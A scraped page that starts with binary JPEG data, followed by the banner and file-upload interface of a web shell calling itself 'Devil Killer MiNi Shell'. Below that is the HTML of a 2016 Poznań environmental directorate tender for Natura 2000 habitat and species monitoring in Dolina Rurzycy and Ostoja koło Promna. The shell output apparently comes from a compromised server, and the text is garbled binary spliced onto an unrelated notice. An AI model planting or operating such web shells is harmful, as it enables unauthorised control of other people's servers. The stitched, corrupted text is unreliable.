JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160520/128380-N-2016.html

<p class="kh_header"><b>Poznań: Usługa polegającą na monitoringu stanu ochrony oraz uzupełnieniu stanu wiedzy o przedmiotach ochrony na terenie obszarów Natura 2000
w województwie wielkopolskim; w układzie zadaniowym, odpowiadającym częściom zamówienia oznaczonym od I do II</b><br>
<b>Numer ogłoszenia: 128380 - 2016; data zamieszczenia: 20.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalna Dyrekcja Ochrony Środowiska w Poznaniu , ul. Jana Henryka Dąbrowskiego 79, 60-529 Poznań, woj. wielkopolskie, tel. 61 639 64 00, faks 61 639 64 47.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegającą na monitoringu stanu ochrony oraz uzupełnieniu stanu wiedzy o przedmiotach ochrony na terenie obszarów Natura 2000
w województwie wielkopolskim; w układzie zadaniowym, odpowiadającym częściom zamówienia oznaczonym od I do II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegającą na monitoringu stanu ochrony oraz uzupełnieniu stanu wiedzy o przedmiotach ochrony na terenie obszarów Natura 2000
w województwie wielkopolskim; w układzie zadaniowym, odpowiadającym częściom zamówienia oznaczonym od I do II:
Część I - Uzupełnienie stanu wiedzy oraz dokonanie oceny stanu ochrony siedlisk przyrodniczych i gatunków w części obszaru Natura 2000 Dolina Rurzycy PLH300017 położonej w województwie wielkopolskim.
Część II - Ocena stanu ochrony siedlisk przyrodniczych i gatunków
w obszarze Natura 2000 Ostoja koło Promna PLH300030..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.70.00.00-4, 90.71.15.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości określonej poniżej dla każdego z zadań osobno:
Część I w wysokości 360,00 PLN (trzysta sześćdziesiąt złotych 00/100),
Część II w wysokości 360,00 PLN (trzysta sześćdziesiąt złotych 00/100).
2. Wadium wnosi się przed upływem terminu składania ofert.
3. Wadium może być wnoszone za pomocą środków przewidzianych w art. 45 ust. 6 ustawy. Wadium wniesione w pieniądzu wpłaca się na rachunek bankowy zamawiającego NBP O/O 78 1010 1469 0004 0413 9800 0000. Zamawiający przechowuje wadium na ww. rachunku bankowym.
4. Dokument potwierdzający wniesienie wadium w innej formie niż pieniądzu należy złożyć w siedzibie Regionalnej Dyrekcji Ochrony Środowiska w Poznaniu przy ul. Jana Henryka Dąbrowskiego 79, a jego kserokopię potwierdzoną za zgodność z oryginałem załączyć do oferty.
5. Jeżeli wadium zostało wniesione w formie gwarancji, to z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy.
6. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert lub ewentualnie na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy, albo nie zgodzi się na przedłużenie okresu związania ofertą, zostanie wykluczony z postępowania, a jego oferta, zostanie uznana za odrzuconą.
7. Zamawiający zwraca wadium:
1)wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza,
2)Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego,
3)niezwłocznie, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8. Jeżeli wadium zostało wniesione w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z rachunku bankowego, na którym było ono przechowywane, pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek Wykonawcy.
9. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy lub pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art.87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
11. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania wiedzy i doświadczenia, jeżeli Wykonawca wykaże,
iż w okresie trzech lat przed upływem terminu składania ofert to w tym okresie dla części I i części II:
- przeprowadził monitoring siedlisk przyrodniczych obejmujący ocenę stanu ochrony zgodnie z załącznikiem do rozporządzenia Ministra Środowiska z dnia 17 lutego 2010 r. w sprawie sporządzania projektu planu zadań ochronnych dla obszaru Natura 2000 (Dz. U. Nr 34, poz. 186 z późn. zm.)
lub 
- przeprowadził przynajmniej jedną inwentaryzację przyrodniczą siedlisk przyrodniczych obejmującą ocenę stanu ochrony zgodnie z załącznikiem do rozporządzenia Ministra Środowiska z dnia 17 lutego 2010 r. w sprawie sporządzania projektu planu zadań ochronnych dla obszaru Natura 2000 (Dz. U. Nr 34, poz. 186 z późn. zm.). Ocena wykazania braku podstaw do wykluczenia z postępowania zostanie dokonana na zasadzie Wykonawca spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca wykaże, iż dysponuje:
a) dla części I - minimum jedną osobą, która:
- posiada dyplom ukończenia studiów wyższych z obszaru nauk przyrodniczych, dziedziny nauk biologicznych i dyscypliny naukowej biologii lub pokrewnej
i
- sporządziła przynajmniej jedną inwentaryzację przyrodniczą siedlisk przyrodniczych, w szczególności na potrzeby planu zadań ochronnych lub planu ochrony dla obszaru Natura 2000
i
- wykaże się autorstwem/współautorstwem nie mniej niż jednej publikacji z zakresu botaniki opublikowanej w recenzowanym czasopiśmie
oraz minimum jedną osobą, która:
- posiada dyplom ukończenia studiów wyższych z obszaru nauk przyrodniczych, dziedziny nauk biologicznych i dyscypliny naukowej biologii lub pokrewnej
i
- sporządziła przynajmniej jedną inwentaryzację przyrodniczą gatunków ślimaków,
w szczególności na potrzeby planu zadań ochronnych lub planu ochrony dla obszaru Natura 2000
i
- wykaże się autorstwem/współautorstwem nie mniej niż jednej publikacji dotyczącej gatunków z rodziny poczwarówkowatych Vertiginidae opublikowanej w recenzowanym czasopiśmie.
b) dla części II - minimum jedną osobą, która:
- posiada dyplom ukończenia studiów wyższych z obszaru nauk przyrodniczych, dziedziny nauk biologicznych i dyscypliny naukowej biologii lub pokrewnej
i
- sporządziła przynajmniej jedną inwentaryzację przyrodniczą siedlisk przyrodniczych,
w szczególności na potrzeby planu zadań ochronnych lub planu ochrony dla obszaru Natura 2000
i
- wykaże się autorstwem/współautorstwem nie mniej niż jednej publikacji z zakresu botaniki opublikowanej w recenzowanym czasopiśmie
oraz minimum jedną osobą, która:
- posiada dyplom ukończenia studiów wyższych z obszaru nauk przyrodniczych, dziedziny nauk biologicznych i dyscypliny naukowej biologii lub pokrewnej
i
- sporządziła przynajmniej jedną inwentaryzację przyrodniczą gatunków ssaków,
w szczególności na potrzeby planu zadań ochronnych lub planu ochrony dla obszaru Natura 2000
i
- wykaże się autorstwem/współautorstwem nie mniej niż jednej publikacji dotyczącej bobra Castor fiber opublikowanej w recenzowanym czasopiśmie. Ocena wykazania braku podstaw do wykluczenia z postępowania zostanie dokonana na zasadzie Wykonawca spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, jeżeli Wykonawca wykaże, iż dysponuje:
a) dla części I - minimum jedną osobą, która:
- posiada dyplom ukończenia studiów wyższych z obszaru nauk przyrodniczych, dziedziny nauk biologicznych i dyscypliny naukowej biologii lub pokrewnej
i
- sporządziła przynajmniej jedną inwentaryzację przyrodniczą siedlisk przyrodniczych, w szczególności na potrzeby planu zadań ochronnych lub planu ochrony dla obszaru Natura 2000
i
- wykaże się autorstwem/współautorstwem nie mniej niż jednej publikacji z zakresu botaniki opublikowanej w recenzowanym czasopiśmie
oraz minimum jedną osobą, która:
- posiada dyplom ukończenia studiów wyższych z obszaru nauk przyrodniczych, dziedziny nauk biologicznych i dyscypliny naukowej biologii lub pokrewnej
i
- sporządziła przynajmniej jedną inwentaryzację przyrodniczą gatunków ślimaków,
w szczególności na potrzeby planu zadań ochronnych lub planu ochrony dla obszaru Natura 2000
i
- wykaże się autorstwem/współautorstwem nie mniej niż jednej publikacji dotyczącej gatunków z rodziny poczwarówkowatych Vertiginidae opublikowanej w recenzowanym czasopiśmie.
b) dla części II - minimum jedną osobą, która:
- posiada dyplom ukończenia studiów wyższych z obszaru nauk przyrodniczych, dziedziny nauk biologicznych i dyscypliny naukowej biologii lub pokrewnej
i
- sporządziła przynajmniej jedną inwentaryzację przyrodniczą siedlisk przyrodniczych,
w szczególności na potrzeby planu zadań ochronnych lub planu ochrony dla obszaru Natura 2000
i
- wykaże się autorstwem/współautorstwem nie mniej niż jednej publikacji z zakresu botaniki opublikowanej w recenzowanym czasopiśmie
oraz minimum jedną osobą, która:
- posiada dyplom ukończenia studiów wyższych z obszaru nauk przyrodniczych, dziedziny nauk biologicznych i dyscypliny naukowej biologii lub pokrewnej
i
- sporządziła przynajmniej jedną inwentaryzację przyrodniczą gatunków ssaków,
w szczególności na potrzeby planu zadań ochronnych lub planu ochrony dla obszaru Natura 2000
i
- wykaże się autorstwem/współautorstwem nie mniej niż jednej publikacji dotyczącej bobra Castor fiber opublikowanej w recenzowanym czasopiśmie. Ocena wykazania braku podstaw do wykluczenia z postępowania zostanie dokonana na zasadzie Wykonawca spełnia albo nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pisemne oświadczenie Wykonawcy o braku zaległości podatkowych oraz o braku zaległości w opłacaniu składek na ubezpieczenie społeczne.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania zamówienia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy tj. możliwość przedłużenia terminu wykonania Zadania lub zapłaty za wykonanie Zadania w następujących przypadkach:
1) niezależnych od Zamawiającego, w szczególności uzyskania przez Zamawiającego zmiany harmonogramu realizacji zadania, umożliwiającej przesunięcie środków finansowych niezbędnych do sfinansowania Zadania, na kolejny rok budżetowy;
2) niezależnych od Zamawiającego lub Wykonawcy, w szczególności, w przypadkach stwierdzenia przez Zamawiającego, że opóźnienie w wykonaniu zamówienia jest wynikiem działania siły wyższej lub wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć ani mu zapobiec, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poznan.rdos.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalna Dyrekcja Ochrony Środowiska w Poznaniu, ul. Jana Henryka Dąbrowskiego 79, 60-529 Poznań -.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2016 godzina 10:00, miejsce: Regionalna Dyrekcja Ochrony Środowiska w Poznaniu, ul. Jana Henryka Dąbrowskiego 79, 60-529 Poznań - kancelaria.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Uzupełnienie stanu wiedzy oraz dokonanie oceny stanu ochrony siedlisk przyrodniczych i gatunków w części obszaru Natura 2000 Dolina Rurzycy PLH300017 położonej w województwie wielkopolskim.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest uzupełnienie stanu wiedzy oraz dokonanie oceny stanu ochrony następujących siedlisk przyrodniczych:
- 3150 Starorzecza i naturalne eutroficzne zbiorniki wodne z roślinnością z Nymphaeion, Potamion;
- 3260 Nizinne i podgórskie rzeki ze zbiorowiskami włosieniczników (Ranunculion fluitantis);
- 7140 Torfowiska przejściowe i trzęsawiska (przeważnie z roślinnością z Scheuchzerio-Caricetea);
- 7220 Źródliska wapienne ze zbiorowiskami Cratoneurion commutati;
- 7230 Górskie i nizinne torfowiska zasadowe o charakterze młak, turzycowisk i mechowisk;
- 9110 Kwaśne buczyny (Luzulo-Fagetum);
- 9130 Żyzne buczyny (Dentario glandulosae-Fagenion, Galio odorati-Fagenion);
- 9160 Grąd subatlantycki (Stellario-Carpinetum);
- 91E0 Łęgi wierzbowe, topolowe, olszowe i jesionowe (Salicetum albo-fragilis, Populetum albae, Alnenion glutinoso-incanae) i olsy źródliskowe;
- 91T0 Sosnowy bór chrobotkowy (Cladonio-Pinetum i chrobotkowa postać Peucedano-Pinetum) oraz gatunków:
- 1014 poczwarówka zwężona Vertigo angustior,
- 1016 poczwarówka jajowata Vertigo moulinsiana.
2. Uzupełnienie stanu wiedzy oraz ocena stanu ochrony, o których mowa w ust. 1 są działaniami ochronnymi wynikającymi z planu zadań ochronnych dla obszaru Natura 2000 Dolina Rurzycy PLH300017 (Dz. Urz. Woj. Wielkopolskiego z 30 czerwca 2014 r.
poz. 3784).
3. Obszarem realizacji przedmiotu zamówienia jest część obszaru Natura 2000 Dolina Rurzycy PLH300017 położona w województwie wielkopolskim.
4. Dla siedliska przyrodniczego 91T0 wykonawca dostarczy szczegółową charakterystykę oraz opis rozmieszczenia w wielkopolskiej części obszaru Natura 2000 Dolina Rurzycy. Wykonawca sporządzi warstwy wektorowe dokumentujące rozmieszczenie ww. siedliska przyrodniczego zgodnie ze Standardem Danych GIS w ochronie przyrody stanowiącym Załącznik nr 8 do SIWZ.
